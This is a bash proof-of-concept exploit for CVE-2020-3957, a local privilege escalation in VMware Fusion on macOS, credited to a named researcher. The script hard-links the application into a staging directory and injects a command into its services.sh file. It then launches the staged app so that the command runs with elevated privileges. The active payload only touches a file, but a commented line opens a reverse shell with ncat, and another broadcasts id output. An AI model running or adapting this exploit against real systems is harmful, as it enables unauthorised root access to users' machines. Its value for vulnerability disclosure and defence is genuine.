#!/bin/bash
#
# Exploit Title: VMware Fusion Elevation Of Privilege
# Date: 2020-06-02
# Exploit Author: Rich Mirch of Critical Start, TeamARES
# CVE: CVE-2020-3957
#

#set -x

# Note: this will execute several times
CMD='touch /tmp/test.123'
#CMD='/usr/local/bin/ncat -e /bin/bash 127.0.0.1 9003'
#CMD='echo WOOT: $(/usr/bin/id)| /usr/bin/wall'

if pgrep -q "VMware Fusion"
then
  echo "Error: VMware Fusion is running"
  exit 1
fi

stage=$(mktemp -d $HOME/.vmware.stager.XXXXX)

echo "Staging files in ${stage?}; remove when done"
find /Applications/VMware\ Fusion.app/ -d -type d | while read src_dir
do
  dst_dir=${src_dir##/Applications/}
  mkdir -p "$stage/$dst_dir"
  (
    cd "$stage/$dst_dir"
    #echo src=$src_dir
    #echo find "$src_dir" -type f -print0 -maxdepth 0
    find "$src_dir" -type f -maxdepth 1 -exec ln "{}" \;
  )
  #exit
done

echo stage=$stage make sure to delete this when done

# inject $CMD into services.sh
sed -i .orig "2i\\
$CMD
" "$stage/$dst_dir/VMware Fusion.app/Contents/Library/services/services.sh"

"$stage/$dst_dir/VMware Fusion.app/Contents/MacOS/VMware Fusion" 2>/dev/null &
p=$!
echo "Sleeping for 5 seconds"
sleep 5
echo "Killing pid=${p?}"
kill ${p?}
wait
echo woot
